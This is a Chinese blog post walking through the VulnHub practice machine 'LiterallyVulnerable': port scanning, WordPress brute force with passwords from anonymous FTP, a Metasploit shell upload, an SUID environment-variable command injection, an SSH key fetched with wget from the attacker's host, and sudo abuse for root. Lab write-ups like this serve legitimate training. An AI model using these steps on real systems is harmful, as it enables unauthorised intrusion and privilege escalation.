<!DOCTYPE html><html lang="zh-CN"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content=""><title>LiterallyVulnerable | 土豆子</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=0.0.0"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/normalize/8.0.1/normalize.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/pure-min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/grids-responsive-min.css"><link rel="stylesheet" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//lib.baomitu.com/jquery/3.4.0/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"><meta name="generator" content="Hexo 4.2.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">LiterallyVulnerable</h1><a id="logo" href="/.">土豆子</a><p class="description">Try Harder</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/about/"><i class="fa fa-user"> 关于</i></a><a href="/tags/"><i class="fa fa-tag"> 标签</i></a><a href="/toolbox/"><i class="fa fa-wrench"> Tools</i></a><a href="/atom.xml"><i class="fa fa-rss"> 订阅</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">LiterallyVulnerable</h1><div class="post-meta">Mar 20, 2020<span> | </span><span class="category"><a href="/categories/vulnhub/">vulnhub</a></span></div><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">文章目录</div><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#信息收集"><span class="toc-number">1.</span> <span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#FTP-匿名登陆"><span class="toc-number">1.1.</span> <span class="toc-text">FTP 匿名登陆</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web-目录枚举"><span class="toc-number">1.2.</span> <span class="toc-text">Web 目录枚举</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#登录-Wordpress-后台"><span class="toc-number">1.3.</span> <span class="toc-text">登录 Wordpress 后台</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#登录系统-Getshell"><span class="toc-number">2.</span> <span class="toc-text">登录系统(Getshell)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#信息收集-1"><span class="toc-number">2.1.</span> <span class="toc-text">信息收集</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#权限提升-User"><span class="toc-number">3.</span> <span class="toc-text">权限提升(User)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#信息收集-2"><span class="toc-number">3.1.</span> <span class="toc-text">信息收集</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#权限提升-root"><span class="toc-number">4.</span> <span class="toc-text">权限提升(root)</span></a></li></ol></div></div><div class="post-content"><blockquote>
<p>2020-03-08 14:26 — 2020-03-09</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">Flags: 3 (local.txt, user.txt &amp; root.txt)</span><br><span class="line">Difficulty Level: Initial Shell (Easy) - Privileges Escalation (Intermediate)</span><br><span class="line">Website: https:&#x2F;&#x2F;ebryx.com</span><br><span class="line">Hint: Maybe, you hasted and left some open holes unchecked?</span><br><span class="line">Literally Vulnerable is supposed to give beginners a taste of real-world scenarios and OSCP machines at the same time! It was inspired highly by the @DC series.</span><br><span class="line"></span><br><span class="line">You&#39;re supposed to know the big three (EEEs) Enumeration, Exploitation &amp; Escalation of pentesting to pwn the machine. The machine is supposed to be beginner-friendly and the difficulty level is Easy-Intermediate depending on your knowledge. You need to have enough information about Linux file types &amp; permissions for privileges escalation.</span><br><span class="line"></span><br><span class="line">Technical Information:</span><br><span class="line">Just download, extract and load the .vmx file in VMware Workstation (tested on VMware Workstation 15.x.x)</span><br><span class="line">The adapter is currently NAT, networking is configured for DHCP and IP will get assigned automatically</span><br><span class="line">Contact:</span><br><span class="line">You can either contact me on twitter @syed__umar or linkedin (&#x2F;in&#x2F;syedumararfeen&#x2F;) for hints!</span><br><span class="line">There are three flags in the machine: local.txt, user.txt &amp; root.txt. You&#39;re supposed to grab all three in order to completely pwn the machine. Hope you like the machine, best of luck! :)</span><br><span class="line"></span><br><span class="line">I&#39;ll try my best to continue with the series!</span><br><span class="line">--------</span><br><span class="line">From : https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;ua-literally-vulnerable,407&#x2F;</span><br></pre></td></tr></table></figure>



<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">kali：172.16.252.129</span><br><span class="line">目标：172.16.252.1/24</span><br></pre></td></tr></table></figure>



<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>主机存活：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -n -sn -T5 -v 172.16.252.1/24 | grep -B 1 <span class="string">"Host is up"</span></span><br></pre></td></tr></table></figure>



<p>目标端口服务：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -n -Pn -sV -O 172.16.252.131</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">21/tcp open  ftp     vsftpd 3.0.3</span><br><span class="line">22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">80/tcp open  http    nginx 1.14.0 (Ubuntu)</span><br></pre></td></tr></table></figure>

<p>全部端口：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">21/tcp open ftp vsftpd 3.0.3</span><br><span class="line">| ftp-anon: Anonymous FTP login allowed (FTP code 230)</span><br><span class="line">|_-rw-r--r-- 1 ftp ftp 325 Dec 04 13:05 backupPasswords </span><br><span class="line">| ftp-syst:</span><br><span class="line">| 	STAT:</span><br><span class="line">| FTP server status:</span><br><span class="line">| Connected to ::ffff:172.16.252.129</span><br><span class="line">| Logged <span class="keyword">in</span> as ftp</span><br><span class="line">| TYPE: ASCII</span><br><span class="line">| No session bandwidth <span class="built_in">limit</span></span><br><span class="line">| Session timeout <span class="keyword">in</span> seconds is 300</span><br><span class="line">| Control connection is plain text</span><br><span class="line">| Data connections will be plain text</span><br><span class="line">| At session startup, client count was 1</span><br><span class="line">| vsFTPd 3.0.3 - secure, fast, stable </span><br><span class="line">|_End of status</span><br><span class="line">22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) </span><br><span class="line">| ssh-hostkey:</span><br><span class="line">| 2048 2f:26:5b:e6:ae:9a:c0:26:76:26:24:00:a7:37:e6:c1 (RSA)</span><br><span class="line">| 256 79:c0:12:33:d6:6d:9a:bd:1f:11:aa:1c:39:1e:b8:95 (ECDSA) </span><br><span class="line">|_ 256 83:27:d3:79:d0:8b:6a:2a:23:57:5b:3c:d7:b4:e5:60 (ED25519)</span><br><span class="line">80/tcp open http nginx 1.14.0 (Ubuntu)</span><br><span class="line">|_http-generator: WordPress 5.3</span><br><span class="line">|_http-server-header: nginx/1.14.0 (Ubuntu)</span><br><span class="line">|_http-title: Not so Vulnerable &amp;<span class="comment">#8211; Just another WordPress site </span></span><br><span class="line">|_http-trane-info: Problem with XML parsing of /evox/about</span><br><span class="line">65535/tcp open http </span><br><span class="line">|_http-server-header: Apache/2.4.29 (Ubuntu)</span><br><span class="line">|_http-title: Apache2 Ubuntu Default Page: It works</span><br></pre></td></tr></table></figure>



<p>开启的端口：21、22、80、65535</p>
<h3 id="FTP-匿名登陆"><a href="#FTP-匿名登陆" class="headerlink" title="FTP 匿名登陆"></a>FTP 匿名登陆</h3><p>FTP 可以匿名访问，得到几个密码，暂不知用途：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ftp-anon: Anonymous FTP login allowed (FTP code 230)</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">*<span class="variable">$eGRIf7v38s</span>&amp;p7 </span><br><span class="line">yP$*SV09YOrx7mY </span><br><span class="line">GmceC&amp;oOBtbnFCH </span><br><span class="line">3!IZguT2piU8X<span class="variable">$c</span> </span><br><span class="line">P&amp;s%F1D4<span class="comment">#KDBSeS</span></span><br><span class="line"><span class="variable">$EPid</span>%J2L9LufO5 </span><br><span class="line">nD!mb*aHON&amp;76&amp;G </span><br><span class="line">$*Ke7q2ko3tqoZo </span><br><span class="line">SCb<span class="variable">$I</span>^gDDqE34fA </span><br><span class="line">Ae%tM0XIWUMsCLp</span><br></pre></td></tr></table></figure>



<p><img src="2020-03-08-14-48-33%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-08 14-48-33屏幕截图"></p>
<p> <img src="2020-03-08-14-49-20%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-08 14-49-20屏幕截图">  </p>
<h3 id="Web-目录枚举"><a href="#Web-目录枚举" class="headerlink" title="Web 目录枚举"></a>Web 目录枚举</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">80&#x2F;tcp open http nginx 1.14.0 (Ubuntu)</span><br><span class="line">|_http-generator: WordPress 5.3</span><br><span class="line">|_http-server-header: nginx&#x2F;1.14.0 (Ubuntu)</span><br><span class="line">|_http-title: Not so Vulnerable &amp;#8211; Just another WordPress site </span><br><span class="line">|_http-trane-info: Problem with XML parsing of &#x2F;evox&#x2F;about</span><br><span class="line">65535&#x2F;tcp open http </span><br><span class="line">|_http-server-header: Apache&#x2F;2.4.29 (Ubuntu)</span><br><span class="line">|_http-title: Apache2 Ubuntu Default Page: It works</span><br></pre></td></tr></table></figure>

<p>80 端口： nginx + Wordpress</p>
<p>65535端口：Apache</p>
<p>控制台显示资源请求错误多，可以看到它是从 <code>literally.vulnerable</code> 请求资源，可以设置 DNS：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">"172.16.252.131    literally.vulnerable"</span> &gt;&gt; /etc/hosts</span><br></pre></td></tr></table></figure>



<p><img src="2020-03-08-14-54-43%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-08 14-54-43屏幕截图"></p>
<p>先扫描 65535 端口，逐一访问，得到 <code>phpcms</code> 页面，访问需要密码，<code>wpsacn</code> 枚举</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dirsearch.py -u <span class="string">"http://172.16.252.131:65535"</span> -e php --random-agents -w /usr/share/wordlists/dirb/big.txt</span><br></pre></td></tr></table></figure>

<p><img src="2020-03-08-15-13-12%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-08-15-13-12屏幕截图"> </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://172.16.252.131:65535/phpcms/ --enumerate</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">[+] maybeadmin</span><br><span class="line">| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)</span><br><span class="line">[+] notadmin</span><br><span class="line">| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)</span><br></pre></td></tr></table></figure>



<p>得到两个用户名，使用前面得到的几个密码枚举爆破，碰运气，得到一组用户名密码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://172.16.252.131:65535/phpcms/ -U users.txt -P backupPasswords</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[i] Valid Combinations Found:</span><br><span class="line">| Username: maybeadmin, Password:<span class="variable">$EPid</span>%J2L9LufO5</span><br></pre></td></tr></table></figure>

<p><img src="2020-03-08-16-25-38%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-08-16-25-38屏幕截图"></p>
<h3 id="登录-Wordpress-后台"><a href="#登录-Wordpress-后台" class="headerlink" title="登录 Wordpress 后台"></a>登录 Wordpress 后台</h3><p>都翻了一遍，得到一组用户名和密码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">notadmin:Pa$$w0rd13!&amp;</span><br></pre></td></tr></table></figure>

<p><img src="2020-03-08-16-41-43%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-08-16-41-43屏幕截图"> </p>
<h2 id="登录系统-Getshell"><a href="#登录系统-Getshell" class="headerlink" title="登录系统(Getshell)"></a>登录系统(Getshell)</h2><p>利用 <code>MSF</code> 上传木马 getshell</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exploit/unix/webapp/wp_admin_shell_upload</span><br></pre></td></tr></table></figure>



<p><img src="2020-03-09-18-18-23%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-09-18-18-23屏幕截图"></p>
<h3 id="信息收集-1"><a href="#信息收集-1" class="headerlink" title="信息收集"></a>信息收集</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; sysinfo</span><br><span class="line">Computer : literallyvulnerable</span><br><span class="line">OS : Linux literallyvulnerable 4.15.0-88-generic <span class="comment">#88-Ubuntu SMP Tue Feb 11 20:11:34 UTC 2020 x86_64</span></span><br><span class="line">Meterpreter : php/linux</span><br><span class="line">meterpreter &gt;</span><br><span class="line"></span><br><span class="line"><span class="comment">######## lsb_release #############</span></span><br><span class="line">www-data@literallyvulnerable:$ lsb_release -a lsb_release -a</span><br><span class="line">No LSB modules are available.</span><br><span class="line">Distributor ID: Ubuntu</span><br><span class="line">Description: Ubuntu 18.04.3 LTS</span><br><span class="line">Release: 18.04</span><br><span class="line">Codename: bionic</span><br><span class="line"></span><br><span class="line"><span class="comment">####### /etc/passwd #######</span></span><br><span class="line">doe:x:1001:1001:Doe,,,:/home/doe:/bin/bash </span><br><span class="line">john:x:1000:1000:,,,:/home/john:/bin/bash</span><br></pre></td></tr></table></figure>



<p>寻找 SUID 程序，得到可疑文件：<code>itseasy</code> </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -<span class="built_in">type</span> f 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p><img src="2020-03-09-19-27-43%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-09-19-27-43屏幕截图"> </p>
<h2 id="权限提升-User"><a href="#权限提升-User" class="headerlink" title="权限提升(User)"></a>权限提升(User)</h2><p>运行 <code>itseasy</code> 得到当前目录绝对路径，看过一篇通过操控 <code>PATH</code> 参数值进行提权；怀疑程序调用了 <code>pwd</code> 命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /tmp</span><br><span class="line">cp /bin/bash /tmp/<span class="built_in">pwd</span>    <span class="comment"># or echo "/bin/bash" &gt; /tmp/pwd</span></span><br><span class="line">chmod 777 /tmp/<span class="built_in">pwd</span></span><br><span class="line"><span class="built_in">export</span> PATH=/tmp:<span class="variable">$PATH</span></span><br></pre></td></tr></table></figure>



<p>执行后，没有得到预期的结果</p>
<p><code>objdump -d</code> 一下，看到个 <code>getenv</code> 函数，用来获取环境变量</p>
<p>也就是可以通过改变环境变量的值来控制这个程序：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">export</span> PWD=\$\(/bin/bash\)</span><br></pre></td></tr></table></figure>



<p><img src="2020-03-09-20-28-54%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-09-20-28-54屏幕截图"> </p>
<p><img src="2020-03-09-19-42-16%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-09-19-42-16屏幕截图"></p>
<p>然后输入命令没有回显了，直接 SSH ：kali 下生成 ssh 公钥上传到目标机</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /home/john/.ssh &amp;&amp; wget http://172.16.252.129:8848/autorized_keys</span><br></pre></td></tr></table></figure>



<h3 id="信息收集-2"><a href="#信息收集-2" class="headerlink" title="信息收集"></a>信息收集</h3><p>HOME 目录下的到一个 base64加密的密码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">am9objpZWlckczhZNDlJQiNaWko= </span><br><span class="line"><span class="built_in">echo</span><span class="string">"am9objpZWlckczhZNDlJQiNaWko="</span>| base64 -d </span><br><span class="line"></span><br><span class="line">john:YZW<span class="variable">$s8Y49IB</span><span class="comment">#ZZJ</span></span><br></pre></td></tr></table></figure>



<p><img src="2020-03-09-19-54-52%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-09-19-54-52屏幕截图"> </p>
<p><img src="2020-03-09-20-02-37%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-09-20-02-37屏幕截图"> </p>
<p><img src="2020-03-09-20-05-51%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-09-20-05-51屏幕截图"></p>
<p>搜索 SUID 程序：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find/ -perm -u=s -<span class="built_in">type</span> f 2&gt;/dev/null</span><br></pre></td></tr></table></figure>



<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudopasswd root</span><br><span class="line">Sorry, user john is not allowed to execute <span class="string">'/usr/bin/passwd root'</span> as root on literallyvulnerable.</span><br></pre></td></tr></table></figure>



<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">sudo -l</span><br><span class="line"></span><br><span class="line">Matching Defaults entries forjohn on literallyvulnerable:</span><br><span class="line">    env_reset, mail_badpass, secure_path=/usr/<span class="built_in">local</span>/sbin\:/usr/<span class="built_in">local</span>/bin\:/usr/</span><br><span class="line">sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin</span><br><span class="line">    User john may run the following commands on literallyvulnerable: </span><br><span class="line">        (root) /var/www/html/test.html</span><br></pre></td></tr></table></figure>



<p>可以运行 <code>/var/www/html/test.html</code> </p>
<h2 id="权限提升-root"><a href="#权限提升-root" class="headerlink" title="权限提升(root)"></a>权限提升(root)</h2><p><code>/var/www/html</code> 目录下没有 <code>test.html</code> 文件，且 <code>john</code> 没有 <code>html</code> 目录的写权限，那就切换回 <code>www-data</code> 用户创建文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">"/bin/bash"</span> &gt; test.html</span><br><span class="line">chmod 777 test.html</span><br></pre></td></tr></table></figure>



<p><code>sudo</code> 运行，提权成功</p>
<p><img src="2020-03-09-20-19-09%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-09-20-19-09屏幕截图"></p>
<p><img src="2020-03-09-20-21-25%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-09-20-21-25屏幕截图"> </p>
<p><img src="2020-03-09-20-21-43%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-03-09-20-21-43屏幕截图"> </p>
</div><div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>Potatoz</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="/2020/03/20/LiterallyVulnerable/">https://mr-potatoz.github.io/2020/03/20/LiterallyVulnerable/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>欢迎转载、引用，但请标明作者和原文地址，谢谢。 :D</li></ul></div><br><div class="tags"><a href="/tags/vulnhub/">vulnhub</a><a href="/tags/OSCP/">OSCP</a></div><div class="post-nav"><a class="pre" href="/2020/03/20/DC-1/">DC-1</a><a class="next" href="/2020/03/20/Five86-2/">Five86-2</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/vulnhub/">vulnhub</a><span class="category-list-count">7</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9A%8F%E7%AC%94/">随笔</a><span class="category-list-count">1</span></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/Note/" style="font-size: 15px;">Note</a> <a href="/tags/vulnhub/" style="font-size: 25px;">vulnhub</a> <a href="/tags/OSCP/" style="font-size: 25px;">OSCP</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> 最近文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/03/20/DC-1/">DC-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/20/LiterallyVulnerable/">LiterallyVulnerable</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/20/Five86-2/">Five86-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/10/Five86-1/">Five86-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/10/hackNos-2/">hackNos-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/03/Me-and-My-Girlfirend1/">Vulnhub靶机——Me and My Girlfirend1</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/03/JIS-CTF/">Vulnhub靶机——JIS-CTF</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/29/Test/">Try Harder</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div><ul></ul><a href="https://github.com/Mr-Potatoz" title="Github" target="_blank">Github</a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2020 <a href="/." rel="nofollow">土豆子.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=0.0.0" async></script><script type="text/javascript" src="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.0" async></script><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css"><script type="text/javascript" src="/js/search.js?v=0.0.0"></script><script>var search_path = 'search.xml';
if (search_path.length == 0) {
   search_path = 'search.xml';
}
var path = '/' + search_path;
searchFunc(path, 'local-search-input', 'local-search-result');
</script><script type="text/javascript" src="/js/codeblock-resizer.js?v=0.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=0.0.0"></script></div></body></html>